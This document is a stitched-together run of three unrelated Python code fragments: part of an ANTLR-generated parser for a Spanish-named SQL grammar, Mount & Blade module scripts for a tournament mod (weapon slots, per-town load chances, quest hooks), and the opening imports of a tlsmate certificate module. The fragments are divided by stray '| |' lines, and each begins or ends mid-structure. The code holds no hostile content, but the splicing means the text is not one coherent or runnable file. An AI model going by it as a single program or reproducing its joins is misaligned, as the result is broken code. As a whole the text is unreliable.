self.match(SQLGramaticaParser.DROP)
self.state = 140
self.match(SQLGramaticaParser.DATABASE)
self.state = 141
self.match(SQLGramaticaParser.IDX)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class ShowDatabaseContext(ParserRuleContext):
def __init__(self, parser, parent=None, invokingState=-1):
super(SQLGramaticaParser.ShowDatabaseContext, self).__init__(parent, invokingState)
self.parser = parser
def SHOW(self):
return self.getToken(SQLGramaticaParser.SHOW, 0)
def DATABASES(self):
return self.getToken(SQLGramaticaParser.DATABASES, 0)
def getRuleIndex(self):
return SQLGramaticaParser.RULE_showDatabase
def enterRule(self, listener):
if hasattr(listener, "enterShowDatabase"):
listener.enterShowDatabase(self)
def exitRule(self, listener):
if hasattr(listener, "exitShowDatabase"):
listener.exitShowDatabase(self)
def accept(self, visitor):
if hasattr(visitor, "visitShowDatabase"):
return visitor.visitShowDatabase(self)
else:
return visitor.visitChildren(self)
def showDatabase(self):
localctx = SQLGramaticaParser.ShowDatabaseContext(self, self._ctx, self.state)
self.enterRule(localctx, 14, self.RULE_showDatabase)
try:
self.enterOuterAlt(localctx, 1)
self.state = 143
self.match(SQLGramaticaParser.SHOW)
self.state = 144
self.match(SQLGramaticaParser.DATABASES)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class UseDatabaseContext(ParserRuleContext):
def __init__(self, parser, parent=None, invokingState=-1):
super(SQLGramaticaParser.UseDatabaseContext, self).__init__(parent, invokingState)
self.parser = parser
def USE(self):
return self.getToken(SQLGramaticaParser.USE, 0)
def DATABASE(self):
return self.getToken(SQLGramaticaParser.DATABASE, 0)
def IDX(self):
return self.getToken(SQLGramaticaParser.IDX, 0)
def getRuleIndex(self):
return SQLGramaticaParser.RULE_useDatabase
def enterRule(self, listener):
if hasattr(listener, "enterUseDatabase"):
listener.enterUseDatabase(self)
def exitRule(self, listener):
if hasattr(listener, "exitUseDatabase"):
listener.exitUseDatabase(self)
def accept(self, visitor):
if hasattr(visitor, "visitUseDatabase"):
return visitor.visitUseDatabase(self)
else:
return visitor.visitChildren(self)
def useDatabase(self):
localctx = SQLGramaticaParser.UseDatabaseContext(self, self._ctx, self.state)
self.enterRule(localctx, 16, self.RULE_useDatabase)
try:
self.enterOuterAlt(localctx, 1)
self.state = 146
self.match(SQLGramaticaParser.USE)
self.state = 147
self.match(SQLGramaticaParser.DATABASE)
self.state = 148
self.match(SQLGramaticaParser.IDX)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class OpTableContext(ParserRuleContext):
def __init__(self, parser, parent=None, invokingState=-1):
super(SQLGramaticaParser.OpTableContext, self).__init__(parent, invokingState)
self.parser = parser
def createTable(self):
return self.getTypedRuleContext(SQLGramaticaParser.CreateTableContext,0)
def alterTable(self):
return self.getTypedRuleContext(SQLGramaticaParser.AlterTableContext,0)
def dropTable(self):
return self.getTypedRuleContext(SQLGramaticaParser.DropTableContext,0)
def showTables(self):
return self.getTypedRuleContext(SQLGramaticaParser.ShowTablesContext,0)
def showColumns(self):
return self.getTypedRuleContext(SQLGramaticaParser.ShowColumnsContext,0)
def insertInto(self):
return self.getTypedRuleContext(SQLGramaticaParser.InsertIntoContext,0)
def updateSet(self):
return self.getTypedRuleContext(SQLGramaticaParser.UpdateSetContext,0)
def deleteFrom(self):
return self.getTypedRuleContext(SQLGramaticaParser.DeleteFromContext,0)
def selectFrom(self):
return self.getTypedRuleContext(SQLGramaticaParser.SelectFromContext,0)
def getRuleIndex(self):
return SQLGramaticaParser.RULE_opTable
def enterRule(self, listener):
if hasattr(listener, "enterOpTable"):
listener.enterOpTable(self)
def exitRule(self, listener):
if hasattr(listener, "exitOpTable"):
listener.exitOpTable(self)
def accept(self, visitor):
if hasattr(visitor, "visitOpTable"):
return visitor.visitOpTable(self)
else:
return visitor.visitChildren(self)
def opTable(self):
localctx = SQLGramaticaParser.OpTableContext(self, self._ctx, self.state)
self.enterRule(localctx, 18, self.RULE_opTable)
try:
self.enterOuterAlt(localctx, 1)
self.state = 159
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,7,self._ctx)
if la_ == 1:
self.state = 150
self.createTable()
pass
elif la_ == 2:
self.state = 151
self.alterTable()
pass
elif la_ == 3:
self.state = 152
self.dropTable()
pass
elif la_ == 4:
self.state = 153
self.showTables()
pass
elif la_ == 5:
self.state = 154
self.showColumns()
pass
elif la_ == 6:
self.state = 155
self.insertInto()
pass
elif la_ == 7:
self.state = 156
self.updateSet()
pass
elif la_ == 8:
self.state = 157
self.deleteFrom()
pass
elif la_ == 9:
self.state = 158
self.selectFrom()
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class TipoContext(ParserRuleContext):
def __init__(self, parser, parent=None, invokingState=-1):
super(SQLGramaticaParser.TipoContext, self).__init__(parent, invokingState)
self.parser = parser
def INT(self):
return self.getToken(SQLGramaticaParser.INT, 0)
def FLOAT(self):
return self.getToken(SQLGramaticaParser.FLOAT, 0)
def DATE(self):
return self.getToken(SQLGramaticaParser.DATE, 0)
def CHAR(self):
return self.getToken(SQLGramaticaParser.CHAR, 0)
def NUMX(self):
return self.getToken(SQLGramaticaParser.NUMX, 0)
def getRuleIndex(self):
return SQLGramaticaParser.RULE_tipo
def enterRule(self, listener):
if hasattr(listener, "enterTipo"):
listener.enterTipo(self)
def exitRule(self, listener):
if hasattr(listener, "exitTipo"):
listener.exitTipo(self)
def accept(self, visitor):
if hasattr(visitor, "visitTipo"):
return visitor.visitTipo(self)
else:
return visitor.visitChildren(self)
def tipo(self):
localctx = SQLGramaticaParser.TipoContext(self, self._ctx, self.state)
self.enterRule(localctx, 20, self.RULE_tipo)
try:
self.state = 168
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [SQLGramaticaParser.INT]:
self.enterOuterAlt(localctx, 1)
self.state = 161
self.match(SQLGramaticaParser.INT)
pass
elif token in [SQLGramaticaParser.FLOAT]:
self.enterOuterAlt(localctx, 2)
self.state = 162
self.match(SQLGramaticaParser.FLOAT)
pass
elif token in [SQLGramaticaParser.DATE]:
self.enterOuterAlt(localctx, 3)
self.state = 163
self.match(SQLGramaticaParser.DATE)
pass
elif token in [SQLGramaticaParser.CHAR]:
self.enterOuterAlt(localctx, 4)
self.state = 164
self.match(SQLGramaticaParser.CHAR)
self.state = 165
self.match(SQLGramaticaParser.T__2)
self.state = 166
self.match(SQLGramaticaParser.NUMX)
self.state = 167
self.match(SQLGramaticaParser.T__3)
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class CreateTableContext(ParserRuleContext):
def __init__(self, parser, parent=None, invokingState=-1):
super(SQLGramaticaParser.CreateTableContext, self).__init__(parent, invokingState)
self.parser = parser
def CREATE(self):
return self.getToken(SQLGramaticaParser.CREATE, 0)
def TABLE(self):
return self.getToken(SQLGramaticaParser.TABLE, 0)
def IDX(self, i=None):
if i is None:
return self.getTokens(SQLGramaticaParser.IDX)
else:
return self.getToken(SQLGramaticaParser.IDX, i)
def tipo(self, i=None):
if i is None:
return self.getTypedRuleContexts(SQLGramaticaParser.TipoContext)
else:
return self.getTypedRuleContext(SQLGramaticaParser.TipoContext,i)
def CONSTRAINT(self, i=None):
if i is None:
return self.getTokens(SQLGramaticaParser.CONSTRAINT)
else:
return self.getToken(SQLGramaticaParser.CONSTRAINT, i)
def constraint(self, i=None):
if i is None:
return self.getTypedRuleContexts(SQLGramaticaParser.ConstraintContext)
else:
return self.getTypedRuleContext(SQLGramaticaParser.ConstraintContext,i)
def getRuleIndex(self):
return SQLGramaticaParser.RULE_createTable
def enterRule(self, listener):
if hasattr(listener, "enterCreateTable"):
listener.enterCreateTable(self)
def exitRule(self, listener):
if hasattr(listener, "exitCreateTable"):
listener.exitCreateTable(self)
def accept(self, visitor):
if hasattr(visitor, "visitCreateTable"):
return visitor.visitCreateTable(self)
else:
return visitor.visitChildren(self)
def createTable(self):
localctx = SQLGramaticaParser.CreateTableContext(self, self._ctx, self.state)
self.enterRule(localctx, 22, self.RULE_createTable)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 170
self.match(SQLGramaticaParser.CREATE)
self.state = 171
self.match(SQLGramaticaParser.TABLE)
self.state = 172
self.match(SQLGramaticaParser.IDX)
self.state = 173
self.match(SQLGramaticaParser.T__2)
self.state = 174
self.match(SQLGramaticaParser.IDX)
self.state = 175
self.tipo()
self.state = 181
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,9,self._ctx)
while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:
if _alt==1:
self.state = 176
self.match(SQLGramaticaParser.T__4)
self.state = 177
self.match(SQLGramaticaParser.IDX)
self.state = 178
self.tipo()
self.state = 183
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,9,self._ctx)
self.state = 195
self._errHandler.sync(self)
_la = self._input.LA(1)
if _la==SQLGramaticaParser.T__4:
self.state = 184
self.match(SQLGramaticaParser.T__4)
self.state = 185
self.match(SQLGramaticaParser.CONSTRAINT)
self.state = 186
self.constraint()
self.state = 192
self._errHandler.sync(self)
_la = self._input.LA(1)
while _la==SQLGramaticaParser.T__4:
self.state = 187
self.match(SQLGramaticaParser.T__4)
self.state = 188
self.match(SQLGramaticaParser.CONSTRAINT)
self.state = 189
self.constraint()
self.state = 194
self._errHandler.sync(self)
_la = self._input.LA(1)
self.state = 197
self.match(SQLGramaticaParser.T__3)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class ConstraintContext(ParserRuleContext):
def __init__(self, parser, parent=None, invokingState=-1):
super(SQLGramaticaParser.ConstraintContext, self).__init__(parent, invokingState)
self.parser = parser
def primaryKey(self):
return self.getTypedRuleContext(SQLGramaticaParser.PrimaryKeyContext,0)
def foreignKey(self, i=None):
| |
- 30 - 39
(assign, ":slot", tpe_weapons_onehand),
(troop_set_slot, tpe_weapons, ":slot", wp_tpe_default_onehand),
(val_add, ":slot", 1),
(troop_set_slot, tpe_weapons, ":slot", wp_tpe_alt_onehand_1),
(val_add, ":slot", 1),
(troop_set_slot, tpe_weapons, ":slot", wp_tpe_alt_onehand_2),
# Two Hand - 40 - 49
(assign, ":slot", tpe_weapons_twohand),
(troop_set_slot, tpe_weapons, ":slot", wp_tpe_default_twohand),
(val_add, ":slot", 1),
(troop_set_slot, tpe_weapons, ":slot", wp_tpe_alt_twohand_1),
# (val_add, ":slot", 1),
# (troop_set_slot, tpe_weapons, ":slot", wp_tpe_alt_twohand_2),
# Crossbow - 50 - 59
(assign, ":slot", tpe_weapons_crossbow),
(troop_set_slot, tpe_weapons, ":slot", wp_tpe_default_crossbow),
# Throwing - 60 - 69
(assign, ":slot", tpe_weapons_throwing),
(troop_set_slot, tpe_weapons, ":slot", wp_tpe_default_javelin),
(val_add, ":slot", 1),
(troop_set_slot, tpe_weapons, ":slot", wp_tpe_alt_throwing_1),
(val_add, ":slot", 1),
(troop_set_slot, tpe_weapons, ":slot", wp_tpe_alt_throwing_2),
# Polearm - 70 - 79
(assign, ":slot", tpe_weapons_polearm),
(troop_set_slot, tpe_weapons, ":slot", wp_tpe_default_polearm),
(val_add, ":slot", 1),
(troop_set_slot, tpe_weapons, ":slot", wp_tpe_alt_polearm_1),
# (val_add, ":slot", 1),
# (troop_set_slot, tpe_weapons, ":slot", wp_tpe_alt_polearm_2),
# Mount - 80 - 89
(assign, ":slot", tpe_weapons_mount),
(troop_set_slot, tpe_weapons, ":slot", wp_tpe_default_horse),
# Outfit - 90 - 99
(assign, ":slot", tpe_weapons_outfit),
(troop_set_slot, tpe_weapons, ":slot", "itm_red_tpe_tunic"),
]
),
# script_tpe_initialize_default_weapons
# Initialize the player settings for weapons in each center.
# Input: none
# Output: none
("tpe_initialize_default_weapons",
[
(try_for_range, ":center_no", towns_begin, towns_end),
(store_sub, ":slot_base", ":center_no", towns_begin),
(val_mul, ":slot_base", 10),
# Lances
(store_add, ":slot_no", ":slot_base", tdp_val_setting_lance),
(troop_set_slot, tpe_appearance, ":slot_no", wp_tpe_default_lance),
# Archery
(store_add, ":slot_no", ":slot_base", tdp_val_setting_archery),
(troop_set_slot, tpe_appearance, ":slot_no", wp_tpe_default_bow),
# One Handed
(store_add, ":slot_no", ":slot_base", tdp_val_setting_onehand),
(troop_set_slot, tpe_appearance, ":slot_no", wp_tpe_default_onehand),
# Two Handed
(store_add, ":slot_no", ":slot_base", tdp_val_setting_twohand),
(troop_set_slot, tpe_appearance, ":slot_no", wp_tpe_default_twohand),
# Crossbows
(store_add, ":slot_no", ":slot_base", tdp_val_setting_crossbow),
(troop_set_slot, tpe_appearance, ":slot_no", wp_tpe_default_crossbow),
# Throwing
(store_add, ":slot_no", ":slot_base", tdp_val_setting_throwing),
(troop_set_slot, tpe_appearance, ":slot_no", wp_tpe_default_javelin),
# Polearms
(store_add, ":slot_no", ":slot_base", tdp_val_setting_polearm),
(troop_set_slot, tpe_appearance, ":slot_no", wp_tpe_default_polearm),
# Mounts
(store_add, ":slot_no", ":slot_base", tdp_val_setting_horse),
(troop_set_slot, tpe_appearance, ":slot_no", wp_tpe_default_horse),
# Outfits
(store_add, ":slot_no", ":slot_base", tdp_val_setting_outfit),
(troop_set_slot, tpe_appearance, ":slot_no", wp_tpe_default_armor),
(try_end),
]),
# script_tpe_determine_real_chance
# Initialize the player settings.
# Input: none
# Output: none
("tpe_determine_real_chance",
[
(store_sub, ":city_offset", "$tournament_town", towns_begin),
(store_mul, ":slot_base", ":city_offset", 10),
### MELEE WEAPONS ###
(store_add, ":slot_onehand", ":slot_base", tdp_val_setting_onehand),
(store_add, ":slot_twohand", ":slot_base", tdp_val_setting_twohand),
(store_add, ":slot_polearm", ":slot_base", tdp_val_setting_polearm),
(troop_get_slot, ":chance_onehand", tpe_settings, ":slot_onehand"),
(troop_get_slot, ":chance_twohand", tpe_settings, ":slot_twohand"),
(troop_get_slot, ":chance_polearm", tpe_settings, ":slot_polearm"),
(assign, ":total", ":chance_onehand"),
(val_add, ":total", ":chance_twohand"),
(val_add, ":total", ":chance_polearm"),
(val_max, ":total", 1), # Prevent Div/0 errors.
# One Hand
(store_mul, reg21, ":chance_onehand", 100),
(val_div, reg21, ":total"),
(troop_get_slot, ":obj_text", tdp_objects, tdp_obj_label_real_chance_of_onehand),
(overlay_set_text, ":obj_text", "@{reg21}%"),
# Two Hand
(store_mul, reg21, ":chance_twohand", 100),
(val_div, reg21, ":total"),
(troop_get_slot, ":obj_text", tdp_objects, tdp_obj_label_real_chance_of_twohand),
(overlay_set_text, ":obj_text", "@{reg21}%"),
# Polearm
(store_mul, reg21, ":chance_polearm", 100),
(val_div, reg21, ":total"),
(troop_get_slot, ":obj_text", tdp_objects, tdp_obj_label_real_chance_of_polearm),
(overlay_set_text, ":obj_text", "@{reg21}%"),
### RANGED WEAPONS & LANCES ###
(store_add, ":slot_lance", ":slot_base", tdp_val_setting_lance),
(store_add, ":slot_archery", ":slot_base", tdp_val_setting_archery),
(store_add, ":slot_crossbow", ":slot_base", tdp_val_setting_crossbow),
(store_add, ":slot_throwing", ":slot_base", tdp_val_setting_throwing),
(troop_get_slot, ":chance_lance", tpe_settings, ":slot_lance"),
(troop_get_slot, ":chance_archery", tpe_settings, ":slot_archery"),
(troop_get_slot, ":chance_crossbow", tpe_settings, ":slot_crossbow"),
(troop_get_slot, ":chance_throwing", tpe_settings, ":slot_throwing"),
(assign, ":total", ":chance_lance"),
(val_add, ":total", ":chance_archery"),
(val_add, ":total", ":chance_crossbow"),
(val_add, ":total", ":chance_throwing"),
(val_max, ":total", 1), # Prevent Div/0 errors.
# Lance
(store_mul, reg21, ":chance_lance", 100),
(val_div, reg21, ":total"),
(troop_get_slot, ":obj_text", tdp_objects, tdp_obj_label_real_chance_of_lance),
(overlay_set_text, ":obj_text", "@{reg21}%"),
# Archery
(store_mul, reg21, ":chance_archery", 100),
(val_div, reg21, ":total"),
(troop_get_slot, ":obj_text", tdp_objects, tdp_obj_label_real_chance_of_archery),
(overlay_set_text, ":obj_text", "@{reg21}%"),
# Crossbow
(store_mul, reg21, ":chance_crossbow", 100),
(val_div, reg21, ":total"),
(troop_get_slot, ":obj_text", tdp_objects, tdp_obj_label_real_chance_of_crossbow),
(overlay_set_text, ":obj_text", "@{reg21}%"),
# Throwning
(store_mul, reg21, ":chance_throwing", 100),
(val_div, reg21, ":total"),
(troop_get_slot, ":obj_text", tdp_objects, tdp_obj_label_real_chance_of_throwing),
(overlay_set_text, ":obj_text", "@{reg21}%"),
### MOUNTS ###
(store_add, ":slot_horse", ":slot_base", tdp_val_setting_horse),
(troop_get_slot, reg21, tpe_settings, ":slot_horse"),
(troop_get_slot, ":obj_text", tdp_objects, tdp_obj_label_real_chance_of_mount),
(overlay_set_text, ":obj_text", "@{reg21}%"),
]),
# script_tpe_initialize_default_design_settings
# Initialize the default settings of load chances in each center.
# Input: none
# Output: none
("tpe_initialize_default_design_settings",
[
(store_script_param, ":center_no", 1),
(store_sub, ":slot_base", ":center_no", towns_begin),
(val_mul, ":slot_base", 10),
(try_for_range, ":setting_slot", tdp_val_setting_lance, tdp_val_setting_horse),
(store_add, ":slot_no", ":slot_base", ":setting_slot"),
(troop_set_slot, tpe_settings, ":slot_no", 100),
(try_end),
# Mounts
(store_add, ":slot_no", ":slot_base", tdp_val_setting_horse),
(troop_set_slot, tpe_settings, ":slot_no", 50),
(try_begin),
(eq, MOD_ARENA_OVERHAUL_INSTALLED, 1),
(party_set_slot, ":center_no", slot_town_arena_option, tpe_default_arena_scene),
(try_end),
]),
# script_tpe_initialize_native_design_settings
# Initialize the default settings of load chances in each center.
# Input: none
# Output: none
("tpe_initialize_native_design_settings",
[
(store_script_param, ":center_no", 1),
(try_begin),
(eq, ":center_no", "p_town_1"),
(call_script, "script_tpe_define_city_native_settings", ":center_no", 0, 0, 50, 80, 0, 0, 0, 0), # Sargoth
(else_try),
(eq, ":center_no", "p_town_2"),
(call_script, "script_tpe_define_city_native_settings", ":center_no", 0, 0, 50, 80, 50, 0, 0, 0), # Tihr
(else_try),
(eq, ":center_no", "p_town_4"),
(call_script, "script_tpe_define_city_native_settings", ":center_no", 40, 80, 50, 20, 0, 0, 0, 0), # Suno
(else_try),
(eq, ":center_no", "p_town_6"),
(call_script, "script_tpe_define_city_native_settings", ":center_no", 100, 100, 0, 0, 0, 0, 0, 0), # Praven
(else_try),
(eq, ":center_no", "p_town_7"),
(call_script, "script_tpe_define_city_native_settings", ":center_no", 100, 0, 100, 0, 0, 0, 0, 0), # Uxkhal
(else_try),
(eq, ":center_no", "p_town_8"),
(call_script, "script_tpe_define_city_native_settings", ":center_no", 40, 80, 50, 20, 0, 0, 0, 0), # Reyvadin
(else_try),
(eq, ":center_no", "p_town_9"),
(call_script, "script_tpe_define_city_native_settings", ":center_no", 100, 50, 0, 0, 0, 20, 30, 0), # Khudan
(else_try),
(this_or_next|eq, ":center_no", "p_town_10"), # Tulga
(eq, ":center_no", "p_town_17"), # Ichamur
(call_script, "script_tpe_define_city_native_settings", ":center_no", 100, 0, 0, 0, 0, 40, 60, 0),
(else_try),
(eq, ":center_no", "p_town_11"),
(call_script, "script_tpe_define_city_native_settings", ":center_no", 100, 0, 50, 0, 0, 20, 30, 0), # Curaw
(else_try),
(eq, ":center_no", "p_town_12"),
(call_script, "script_tpe_define_city_native_settings", ":center_no", 40, 0, 0, 100, 0, 0, 0, 0), # Wercheg
(else_try),
(eq, ":center_no", "p_town_13"),
(call_script, "script_tpe_define_city_native_settings", ":center_no", 40, 80, 50, 20, 30, 0, 60, 0), # Rivacheg
(else_try),
(this_or_next|eq, ":center_no", "p_town_14"), # Halmar
(eq, ":center_no", "p_town_18"), # Narra
(call_script, "script_tpe_define_city_native_settings", ":center_no", 100, 50, 25, 0, 0, 30, 50, 0),
(else_try),
(this_or_next|eq, ":center_no", "p_town_5"), # Jelkala
(this_or_next|eq, ":center_no", "p_town_15"), # Yalen
(eq, ":center_no", "p_town_3"), # Veluca
(call_script, "script_tpe_define_city_native_settings", ":center_no", 25, 100, 60, 0, 30, 0, 30, 50),
(else_try),
(eq, ":center_no", "p_town_16"),
(call_script, "script_tpe_define_city_native_settings", ":center_no", 40, 80, 50, 20, 40, 0, 0, 0), # Dhirim
(else_try),
(this_or_next|eq, ":center_no", "p_town_19"), # Shariz
(eq, ":center_no", "p_town_21"), # Ahmerrad
(call_script, "script_tpe_define_city_native_settings", ":center_no", 100, 40, 60, 0, 30, 30, 0, 0),
(else_try),
(this_or_next|eq, ":center_no", "p_town_20"), # Durquba
(eq, ":center_no", "p_town_22"), # Bariyye
(call_script, "script_tpe_define_city_native_settings", ":center_no", 50, 0, 60, 0, 30, 30, 0, 0),
(else_try),
(call_script, "script_tpe_define_city_native_settings", ":center_no", 50, 100, 100, 100, 100, 100, 100, 100), # Default Response
(try_end),
(party_set_slot, ":center_no", slot_town_arena_option, 0),
]),
# script_tpe_define_city_native_settings
# Initialize the default settings of load chances in each center.
# Input: none
# Output: none
("tpe_define_city_native_settings",
[
(store_script_param, ":center_no", 1),
(store_script_param, ":horse_chance", 2),
(store_script_param, ":lance_chance", 3),
(store_script_param, ":sword_chance", 4),
(store_script_param, ":axe_chance", 5),
(store_script_param, ":bow_chance", 6),
(store_script_param, ":javelin_chance", 7),
(store_script_param, ":mounted_bow_chance", 8),
(store_script_param, ":crossbow_sword_chance", 9),
# (store_script_param, ":armor_item_begin", 9),
# (store_script_param, ":helm_item_begin", 10),
(store_add, ":total_chance", ":sword_chance", ":axe_chance"),
(val_add, ":total_chance", ":crossbow_sword_chance"),
(val_min, ":total_chance", 100),
(val_add, ":bow_chance", ":mounted_bow_chance"),
(val_min, ":bow_chance", 100),
(store_sub, ":slot_base", ":center_no", towns_begin),
(val_mul, ":slot_base", 10),
# Lances
(store_add, ":slot_no", ":slot_base", tdp_val_setting_lance),
(troop_set_slot, tpe_settings, ":slot_no", ":lance_chance"),
# Archery
(store_add, ":slot_no", ":slot_base", tdp_val_setting_archery),
(troop_set_slot, tpe_settings, ":slot_no", ":bow_chance"),
# One Handed
(store_add, ":slot_no", ":slot_base", tdp_val_setting_onehand),
(troop_set_slot, tpe_settings, ":slot_no", ":total_chance"),
# Two Handed
(store_add, ":slot_no", ":slot_base", tdp_val_setting_twohand),
(troop_set_slot, tpe_settings, ":slot_no", ":total_chance"),
# Crossbows
(store_add, ":slot_no", ":slot_base", tdp_val_setting_crossbow),
(troop_set_slot, tpe_settings, ":slot_no", ":crossbow_sword_chance"),
# Throwing
(store_add, ":slot_no", ":slot_base", tdp_val_setting_throwing),
(troop_set_slot, tpe_settings, ":slot_no", ":javelin_chance"),
# Polearms
(store_add, ":slot_no", ":slot_base", tdp_val_setting_polearm),
(troop_set_slot, tpe_settings, ":slot_no", 0),
# Mounts
(store_add, ":slot_no", ":slot_base", tdp_val_setting_horse),
(troop_set_slot, tpe_settings, ":slot_no", ":horse_chance"),
# Outfits
(store_add, ":slot_no", ":slot_base", tdp_val_setting_outfit),
(troop_set_slot, tpe_settings, ":slot_no", 100),
]),
# END - TOURNAMENT DESIGN PANEL SCRIPTS
###########################################################################################################################
##### TOURNAMENT QUEST SCRIPTS #####
###########################################################################################################################
# script_cf_quest_floris_active_tournament_hook_1
# Causes the quest to register as being completed successfully if you enter the town the tournament is being held in while having the quest active and join the tournament.
# Input: none
# Output: none
("quest_floris_active_tournament_hook_1",
[
(try_begin),
(check_quest_active, "qst_floris_active_tournament"),
(neg|quest_slot_eq, "qst_floris_active_tournament", slot_quest_current_state, qp1_tournament_participated_in_tournament), # Prevents repeated reputation gains in the TPE menu.
(quest_slot_eq, "qst_floris_active_tournament", slot_quest_target_center, "$current_town"),
(try_begin),
(quest_slot_eq, "qst_floris_active_tournament", slot_quest_current_state, qp1_tournament_message_received), # You were invited to attend. Still need to meet with host.
(call_script, "script_succeed_quest", "qst_floris_active_tournament"),
(quest_set_slot, "qst_floris_active_tournament", slot_quest_current_state, qp1_tournament_participated_in_tournament),
(else_try),
(quest_slot_eq, "qst_floris_active_tournament", slot_quest_current_state, 0), # You were not invited to attend. Quest is automatically completed.
(call_script, "script_succeed_quest", "qst_floris_active_tournament"),
(complete_quest, "qst_floris_active_tournament"),
(try_end),
(ge, "$tpe_quest_reactions", TPE_QUEST_REACTIONS_HIGH),
(troop_slot_ge, "trp_player", slot_troop_renown, 200),
(call_script, "script_change_player_relation_with_center", "$current_town", 2),
(try_end),
]),
# END - TOURNAMENT QUEST SCRIPTS
# script_tpe_initialize_player_settings
# Initialize the player settings.
# Input: none
# Output: none
("tpe_initialize_player_settings",
[
(troop_set_slot, TPE_OPTIONS, tpe_val_opt_awards, 0),
(troop_set_slot, TPE_OPTIONS, tpe_val_diff_setting, 0),
(troop_set_slot, "trp_tpe_presobj", tpe_checkbox_opt_damage, 0),
(troop_set_slot, TPE_OPTIONS, tpe_val_level_scale, 0),
(troop_set_slot, "trp_player", slot_troop_tournament_team_request, 4),
(troop_set_slot, TPE_OPTIONS, tpe_val_show_health, 1),
(assign, "$g_wp_tpe_active", 1),
(assign, "$tpe_quests_active", 1),
(assign, "$tpe_quest_reactions", TPE_QUEST_REACTIONS_MEDIUM),
(assign, "$g_wp_tpe_renown_scaling", 1),
(assign, "$g_wp_tpe_option_icd_active", 1),
(call_script, "script_tpe_initialize_default_weapons"),
(try_for_range, ":center_no", towns_begin, towns_end),
(call_script, "script_tpe_initialize_default_design_settings", ":center_no"),
(try_end),
]),
# script_tpe_hook_switch_between_native_or_tpe
# Evaluates if TPE is activated and sends the player to the TPE or native menus.
# Input: none
# Output: none
("tpe_hook_switch_between_native_or_tpe",
[
(assign, "$g_tournament_cur_tier", 0),
(assign, "$g_tournament_player_team_won", -1),
(assign, "$g_tournament_bet_placed", 0),
(assign, "$g_tournament_bet_win_amount", 0),
(assign, "$g_tournament_last_bet_tier", -1),
(assign, "$g_tournament_next_num_teams", 0),
(assign, "$g_tournament_next_team_size", 0),
(try_begin),
(eq, "$g_wp_tpe_active", 0),
(call_script, "script_fill_tournament_participants_troop", "$current_town", 1),
(jump_to_menu, "mnu_town_tournament"),
(else_try),
(eq, "$g_wp_tpe_active", 1),
(call_script, "script_tpe_fill_tournament_participants_troop", "$current_town", 1),
(jump_to_menu, "mnu_tpe_town_tournament"),
(try_end),
]),
# script_tpe_store_town_faction_to_reg0
# Returns the faction number of a center under a number of different circumstances.
# Input: none
# Output: none
("tpe_store_town_faction_to_reg0",
[
(store_script_param, ":center_no", 1),
(assign, ":faction_picked", 0),
(try_begin),
# Figure out faction based on center.
(store_faction_of_party, ":faction_no", ":center_no"),
(is_between, ":faction_no", kingdoms_begin, kingdoms_end),
(assign, ":faction_picked", ":faction_no"),
(ge, DEBUG_TPE_general, 1),
(str_store_faction_name, s21, ":faction_no"),
(str_store_party_name, s22, ":center_no"),
(display_message, "@DEBUG (TPE): Faction '{s21}' determined by '{s22}'."),
(else_try),
# Use the lord of the town if possible.
(eq, ":faction_picked", 0),
(party_get_slot, ":troop_lord", ":center_no", slot_town_lord),
(ge, ":troop_lord", 0),
(store_troop_faction, ":faction_no", ":troop_lord"),
(is_between, ":faction_no", kingdoms_begin, kingdoms_end),
(assign, ":faction_picked", ":faction_no"),
(ge, DEBUG_TPE_general, 1),
(str_store_faction_name, s21, ":faction_no"),
(str_store_troop_name, s22, ":troop_lord"),
(display_message, "@DEBUG (TPE): Faction '{s21}' determined by '{s22}'."),
# (else_try),
# # No valid town lord found. Let's switch to using the culture.
# (eq, ":faction_picked", 0),
# (party_get_slot, ":culture_town", ":center_no", slot_center_culture),
# (store_sub, ":faction_offset", ":culture_town", "fac_culture_1"),
# (try_begin),
# # Check to make sure we're dealing with a culture other than the player's.
# (neq, ":culture_town", "fac_culture_7"),
# (store_add, ":faction_no", ":faction_offset", kingdoms_begin),
# (val_add, ":faction_no", 1), # Push the faction past the player's supporters.
# (else_try),
# # The culture is the player's so it needs to be handled differently.
# (assign, ":faction_no", "fac_player_supporters_faction"),
# (try_end),
# (is_between, ":faction_no", kingdoms_begin, kingdoms_end),
# (assign, ":faction_picked", ":faction_no"),
# (ge, DEBUG_TPE_general, 1),
# (str_store_faction_name, s21, ":faction_no"),
# (str_store_faction_name, s22, ":culture_town"),
# (display_message, "@DEBUG (TPE): Faction '{s21}' determined by culture '{s22}'."),
(else_try),
# No valid faction could be determined.
(eq, ":faction_picked", 0),
(display_message, "@TPE ERROR! No valid faction could be determined for this town.", gpu_red),
(try_end),
(assign, reg0, ":faction_picked"),
]),
]
from util_wrappers import *
from util_scripts import *
scripts_directives = [
#rename scripts to "insert" switch scripts (see end of scripts[])
#[SD_RENAME, "end_tournament_fight" , "orig_end_tournament_fight"],
#[SD_RENAME, "fill_tournament_participants_troop" , "orig_fill_tournament_participants_troop"],
#[SD_RENAME, "get_random_tournament_participant" , "orig_get_random_tournament_participant"],
#[SD_RENAME, "set_items_for_tournament" , "orig_set_items_for_tournament"],
# | |
# -*- coding: utf-8 -*-
"""Module for certificates
"""
# import basic stuff
import logging
from typing import Optional, List, Any
import datetime
import builtins
# import own stuff
import tlsmate.cert_utils as cert_utils
import tlsmate.ext as ext
import tlsmate.kdf as kdf
import tlsmate.tls as tls
# import other stuff
from cryptography import x509
from cryptography.x509.oid import NameOID, ExtensionOID
